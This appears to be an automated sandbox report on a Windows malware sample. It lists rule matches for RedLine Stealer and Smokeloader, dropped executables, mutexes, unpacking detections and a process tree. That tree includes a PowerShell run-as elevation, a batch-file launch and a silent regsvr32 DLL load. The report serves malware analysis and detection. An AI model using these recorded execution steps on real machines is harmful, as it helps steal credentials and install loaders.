                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                  Source: ccQGH1mKws.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 10.2.93D2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 16.2.93D2.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 29.0.BB62.exe.b80000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                  Source: 00000001.00000002.1549966457.0000000000529000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000018.00000002.1889731561.0000000002800000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000006.00000002.1793881515.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000027.00000002.2031095427.0000000002C40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000006.00000002.1793962447.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000001.00000002.1550099786.00000000020B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000027.00000002.2031135707.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000027.00000002.2031606474.0000000002DCA000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000001.00000002.1549874616.0000000000500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000021.00000002.2034312044.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000006.00000002.1794086138.0000000000729000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000001.00000002.1549853433.00000000004F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000006.00000002.1793860457.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000027.00000002.2031801803.0000000004851000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                  Source: 00000021.00000002.2033637211.0000000002A00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000007.00000002.1767566996.000000000233D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exe, type: DROPPEDMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                  Source: 97EA.dll.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 8837.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 671C.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: csrss.exe.8.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: anyburnfree.exe.21.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: IMAP List Mailboxes 65.exe.27.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: syncUpd[1].exe.34.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: nsfDE87.tmp.34.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@84/98@522/34
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeCode function: 16_2_004023F2 LoadLibraryA,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadLibraryA,NtShutdownSystem,16_2_004023F2
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeCode function: 1_2_0052C34C CreateToolhelp32Snapshot,Module32First,1_2_0052C34C
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\afratejJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\93D2.exeMutant created: \Sessions\1\BaseNamedObjects\jmuZVxzUSQKZJ
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_03
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5824:120:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:3412:64:WilError_03
                  Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4248
                  Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\8837.tmpJump to behavior
                  Source: Yara matchFile source: 38.0.BroomSetup.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000026.00000000.1927662842.0000000000401000.00000020.00000001.01000000.0000001A.sdmp, type: MEMORY
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, type: DROPPED
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                  Source: ccQGH1mKws.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeFile read: C:\Windows\System32\drivers\etc\hosts
                  Source: ccQGH1mKws.exeReversingLabs: Detection: 81%
                  Source: unknownProcess created: C:\Users\user\Desktop\ccQGH1mKws.exe C:\Users\user\Desktop\ccQGH1mKws.exe
                  Source: unknownProcess created: C:\Users\user\AppData\Roaming\afratej C:\Users\user\AppData\Roaming\afratej
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8837.exe C:\Users\user\AppData\Local\Temp\8837.exe
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeProcess created: C:\Users\user\AppData\Local\Temp\8837.exe C:\Users\user\AppData\Local\Temp\8837.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8E91.exe C:\Users\user\AppData\Local\Temp\8E91.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\93D2.exe C:\Users\user\AppData\Local\Temp\93D2.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\97EA.dll
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\97EA.dll
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\93D2.exe "C:\Users\user\AppData\Local\Temp\93D2.exe"
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A6A0.exe C:\Users\user\AppData\Local\Temp\A6A0.exe
                  Source: C:\Users\user\AppData\Local\Temp\A6A0.exeProcess created: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmp "C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmp" /SL5="$20424,8085089,54272,C:\Users\user\AppData\Local\Temp\A6A0.exe"
                  Source: C:\Users\user\AppData\Local\Temp\is-P4IIS.tmp\A6A0.tmpProcess created: C:\Users\user\AppData\Local\Temp\A6A0.exe "C:\Users\user\AppData\Local\Temp\A6A0.exe" /SPAWNWND=$20422 /NOTIFYWND=$20424
                  Source: C:\Users\user\AppData\Local\Temp\A6A0.exeProcess created: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp "C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmp" /SL5="$20434,8085089,54272,C:\Users\user\AppData\Local\Temp\A6A0.exe" /SPAWNWND=$20422 /NOTIFYWND=$20424
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4248 -ip 4248
                  Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                  Source: C:\Users\user\AppData\Local\Temp\8E91.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 1396
                  Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpProcess created: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe "C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe" -i
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BB62.exe C:\Users\user\AppData\Local\Temp\BB62.exe
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpProcess created: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe "C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe" -s
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DC49.exe C:\Users\user\AppData\Local\Temp\DC49.exe
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8837.exe C:\Users\user\AppData\Local\Temp\8837.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\8E91.exe C:\Users\user\AppData\Local\Temp\8E91.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\93D2.exe C:\Users\user\AppData\Local\Temp\93D2.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\97EA.dllJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A6A0.exe C:\Users\user\AppData\Local\Temp\A6A0.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe" Jump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\BB62.exe C:\Users\user\AppData\Local\Temp\BB62.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\DC49.exe C:\Users\user\AppData\Local\Temp\DC49.exeJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Windows\explorer.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\8837.exeProcess created: C:\Users\user\AppData\Local\Temp\8837.exe C:\Users\user\AppData\Local\Temp\8837.exeJump to behavior
                  Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\97EA.dll
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 4248 -ip 4248
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4248 -s 1396
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\DC49.exe C:\Users\user\AppData\Local\Temp\DC49.exe
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                  Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeProcess created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: C:\Users\user\AppData\Local\Temp\BroomSetup.exe C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                  Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                  Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 1251
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: unknown unknown
                  Source: C:\Users\user\AppData\Local\Temp\FourthX.exeProcess created: unknown unknown
                  Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                  Source: C:\Users\user\AppData\Local\Temp\is-C1KVS.tmp\A6A0.tmpWindow found: window name: TMainForm
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\BB62.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                  Data Obfuscation

                  barindex
                  Detected unpacking (changes PE section rights)
                  Source: C:\Users\user\Desktop\ccQGH1mKws.exeUnpacked PE file: 1.2.ccQGH1mKws.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.bizope:W;.tls:W;.homupin:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Roaming\afratejUnpacked PE file: 6.2.afratej.400000.0.unpack .text:ER;.rdata:R;.data:W;.bizope:W;.tls:W;.homupin:W;.rsrc:R; vs .text:EW;
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeUnpacked PE file: 27.2.anyburnfree.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R;.cab7:EW; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeUnpacked PE file: 33.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.idata:W;.reloc:R;.symtab:R;
                  Source: C:\Users\user\AppData\Local\Temp\DC49.exeUnpacked PE file: 39.2.DC49.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rofi:W;.tls:W;.rehopeb:R;.jidexi:W;.rsrc:R; vs .text:EW;
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exeUnpacked PE file: 27.2.anyburnfree.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exeUnpacked PE file: 33.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack
